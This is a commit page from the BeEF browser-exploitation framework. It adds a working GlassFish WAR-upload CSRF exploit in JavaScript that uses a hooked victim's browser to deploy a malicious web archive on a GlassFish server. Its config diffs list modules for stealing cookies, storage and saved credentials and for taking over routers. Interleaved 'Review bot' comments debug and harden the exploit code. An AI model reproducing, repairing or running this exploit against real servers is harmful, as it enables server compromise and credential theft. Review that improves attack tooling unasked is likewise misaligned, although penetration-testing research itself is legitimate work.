daily update from repo

Merge branch 'master' of github.com:beefproject/beef
This commit is contained in:
qswain2
2012-06-06 19:30:04 -04:00
32 changed files with 313 additions and 31 deletions


@@ -1,3 +1,4 @@
#!/bin/bash
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#


@@ -22,5 +22,5 @@ beef:
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]
working: ["FF", "IE"]
not_working: ["O", "C", "S"]


@@ -17,11 +17,11 @@ beef:
module:
ajax_fingerprint:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
working: ["FF","S"]
working: ["FF", "S"]
not_working: ["C"]


@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]


@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Content (Deface)"
description: "Overwrite the page, title and shortcut icon on the hooked page."
authors: ["antisnatchor"]


@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_local_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_page_html:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HTML"
description: "This module will retrieve the HTML from the current page."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_page_links:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]


@@ -17,7 +17,7 @@ beef:
module:
get_session_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Session Storage"
description: "Extracts data from the HTML5 sessionStorage object."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_stored_credentials:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Stored Credentials"
description: "This module retrieves saved username/password combinations from the login page on the hooked domain.<br /><br />It will fail if more than one set of domain credentials are saved in the browser."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
link_rewrite:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links."
authors: ["passbe"]


@@ -17,7 +17,7 @@ beef:
module:
link_rewrite_sslstrip:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (HTTPS)"
description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
authors: ["bcoles"]


@@ -17,10 +17,10 @@ beef:
module:
mobilesafari_address_spoofing:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "iOS Address Bar Spoofing"
description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
authors: ["bcoles","xntrik","majorsecurity.net"]
authors: ["bcoles", "xntrik", "majorsecurity.net"]
target:
working:
S:


@@ -17,7 +17,7 @@ beef:
module:
prompt_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]


@@ -17,7 +17,7 @@ beef:
module:
replace_video:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]


@@ -17,7 +17,7 @@ beef:
module:
rickroll:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]


@@ -17,7 +17,7 @@ beef:
module:
site_redirect:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]


@@ -17,7 +17,7 @@ beef:
module:
site_redirect_iframe:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]


@@ -19,7 +19,7 @@ beef:
module:
Dlink_dcs_series_csrf:
enable: true
category: ["Exploits","Camera"]
category: ["Exploits", "Camera"]
name: "Dlink DCS series CSRF"
description: "Attempts to change the password on a Dlink DCS series camera."
authors: ["bcoles"]


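--- /dev/null
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
+// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
+beef.execute(function() {
+var restHost = '<%= @restHost %>';
+var warName = '<%= @warName %>';
+var warBase = '<%= @warBase %>';
+var logUrl = restHost + '/management/domain/applications/application';
+//BEGIN Daniel Guerrero binary Base64-library
+/*
+Copyright (c) 2011, Daniel Guerrero
+All rights reserved.
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+* Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+* Redistributions in binary form must reproduce the above copyright
+notice, this list of conditions and the following disclaimer in the
+documentation and/or other materials provided with the distribution.
+* Neither the name of the Daniel Guerrero nor the
+names of its contributors may be used to endorse or promote products
+derived from this software without specific prior written permission.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+/**
+* Uses the new array typed in javascript to binary base64 encode/decode
+* at the moment just decodes a binary base64 encoded
+* into either an ArrayBuffer (decodeArrayBuffer)
+* or into an Uint8Array (decode)
+*
+* References:
+* https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer
+* https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array
+*/
+var Base64Binary = {
+_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+/* will return a Uint8Array type */
+decodeArrayBuffer: function(input) {
+var bytes = Math.ceil( (3*input.length) / 4.0);
+var ab = new ArrayBuffer(bytes);
+this.decode(input, ab);
+return ab;
+},
+decode: function(input, arrayBuffer) {
+//get last chars to see if are valid
+var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1));
+var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1));
+var bytes = Math.ceil( (3*input.length) / 4.0);
+if (lkey1 == 64) bytes--; //padding chars, so skip
+if (lkey2 == 64) bytes--; //padding chars, so skip
+var uarray;
+var chr1, chr2, chr3;
+var enc1, enc2, enc3, enc4;
+var i = 0;
+var j = 0;
+if (arrayBuffer)
+uarray = new Uint8Array(arrayBuffer);
+else
+uarray = new Uint8Array(bytes);
+input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
+for (i=0; i<bytes; i+=3) {
+//get the 3 octects in 4 ascii chars
+enc1 = this._keyStr.indexOf(input.charAt(j++));
+enc2 = this._keyStr.indexOf(input.charAt(j++));
+enc3 = this._keyStr.indexOf(input.charAt(j++));
+enc4 = this._keyStr.indexOf(input.charAt(j++));
+chr1 = (enc1 << 2) | (enc2 >> 4);
+chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+chr3 = ((enc3 & 3) << 6) | enc4;
+uarray[i] = chr1;
+if (enc3 != 64) uarray[i+1] = chr2;
+if (enc4 != 64) uarray[i+2] = chr3;
+}
+return uarray;
+}
+}
+//END Daniel Guerrero binary Base64-library
+if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+function byteValue(x) {
+return x.charCodeAt(0) & 0xff;
+}
+var ords = Array.prototype.map.call(datastr, byteValue);
+var ui8a = new Uint8Array(ords);
+this.send(ui8a.buffer);
+}
+}
+function fileUpload(fileData, fileName) {
+boundary = "HELLOWORLD270883142628617",
+uri = logUrl,
+xhr = new XMLHttpRequest();
+var additionalFields = {
+asyncreplication: "true",
+availabilityenabled: "false",
+contextroot: "",
+createtables: "true",
+dbvendorname: "",
+deploymentplan: "",
+description: "",
+dropandcreatetables: "true",
+enabled: "true",
+force: "false",
+generatermistubs: "false",
+isredeploy: "false",
+keepfailedstubs: "false",
+keepreposdir: "false",
+keepstate: "true",
+lbenabled: "true",
+libraries: "",
+logReportedErrors: "true",
+name: "",
+precompilejsp: "false",
+properties: "",
+property: "",
+retrieve: "",
+target: "",
+type: "",
+uniquetablenames: "true",
+verify: "false",
+virtualservers: "",
+__remove_empty_entries__: "true"
+}
+var fileFieldName = "id";
+xhr.open("POST", uri, true);
+xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
+xhr.withCredentials = "true";
+xhr.onreadystatechange = function() {
+if (xhr.readyState == 4) {
+beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.');
+}
+}
+var body = "";
+for (var i in additionalFields) {
+if (additionalFields.hasOwnProperty(i)) {
+body += addField(i, additionalFields[i], boundary);
+}
+}
+body += addFileField(fileFieldName, fileData, fileName, boundary);
+body += "--" + boundary + "--";
+xhr.setRequestHeader('Content-length', body.length);
+xhr.sendAsBinary(body);
+return true;
+}
+function addField(name, value, boundary) {
+var c = "--" + boundary + "\r\n"
+c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
+c += value + "\r\n";
+return c;
+}
+function addFileField(name, value, filename, boundary) {
+var c = "--" + boundary + "\r\n"
+c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';
+c += "Content-Type: application/octet-stream\r\n\r\n";
+for(var i = 0; i< value.length; i++){
+c+=String.fromCharCode(value[i] & 0xff);
+}
+c += "\r\n";
+return c;
+}
+function start() {
+fileUpload(Base64Binary.decode(warBase),warName);
+}
+start();
+});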
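Review bot: The vendored Base64 decoder mis-sizes its output when the WAR's base64 ends in a single `=`, because `lkey2` at the top of `decode` reads the same last character as `lkey1` (`input.charAt(input.length-1)` twice) and so subtracts two padding bytes where only one applies; since `start()` calls `decode(warBase)` with no buffer argument, `uarray` is allocated one byte short and the archive's final byte is silently dropped by the out-of-range typed-array write, which corrupts the uploaded WAR. The fix is `var lkey2 = this._keyStr.indexOf(input.charAt(input.length-2));`, and `input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");` should move above the `bytes` computation so any whitespace in `warBase` is not counted as payload. In `fileUpload`, `boundary`, `uri` and `xhr` are assigned without `var`, leaking three globals onto the hooked page's window where page scripts can see them — `var boundary = "HELLOWORLD270883142628617", uri = logUrl, xhr = new XMLHttpRequest();` keeps them local. The `onreadystatechange` handler reports the deployment as "completed" without consulting `xhr.status`; for a cross-origin request the server answers without CORS headers the status is 0 and the body unreadable, so the message should say the request was sent rather than imply success. `setRequestHeader('Content-length', body.length)` names a header browsers refuse to set from script, so that line is dead and can go.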


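--- /dev/null
+++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+module:
+glassfish_war_upload_xsrf:
+enable: true
+category: "Exploits"
+name: "GlassFish WAR Upload XSRF"
+description: "This module attempts to deploy a malicious war file on an Oracle GlassFish Server 3.1.1 (build 12). It makes advantage of a CSRF bug in the REST interface.<br />For more information refer to <a href='http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html'>http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html</a>."
+authors: ["Bart Leppens"]
+target:
+working: ["FF", "S", "C"]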
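Review bot: `category: "Exploits"` is a bare string while every other module config touched by this commit uses a list (`category: ["Exploits", "Router"]`, `["Exploits", "Camera"]`, `["Exploits", "Switch"]`); if the framework builds its category tree from a list, this module will land somewhere different from its siblings, so `category: ["Exploits"]` keeps it consistent. The `target.working` list declares Firefox, Safari and Chrome, but the accompanying command.js references `Uint8Array` unguarded (in the `sendAsBinary` shim condition and inside `Base64Binary.decode`) and sets `xhr.withCredentials`, so a browser without typed arrays throws before any request is sent — worth stating the typed-array requirement in the description or adding a `not_working` entry as the cachetime module does. A wording nit in the description: "It makes advantage of a CSRF bug" should read "It takes advantage of a CSRF bug".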



@@ -17,7 +17,7 @@ beef:
module:
bt_home_hub_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "BT Home Hub CSRF"
description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5367_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5367 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5624_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5624 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
dlink_dsl500t_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "D-Link DSL500T CSRF"
description: "Attempts to change the password on a D-Link DSL500T router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
Huawei_smartax_mt880_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Huawei SmartAX MT880 CSRF"
description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
linksys_befsr41_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys BEFSR41 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router."
authors: ["Martin Barbella"]


@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g2_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G2 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router."
authors: ["Martin Barbella"]


@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router."
authors: ["Martin Barbella"]


@@ -17,7 +17,7 @@ beef:
module:
Netgear_gs108t_csrf:
enable: true
category: ["Exploits","Switch"]
category: ["Exploits", "Switch"]
name: "Netgear GS108T CSRF"
description: "Attempts to change the password on a Netgear GS108T managed switch."
authors: ["Bart Leppens"]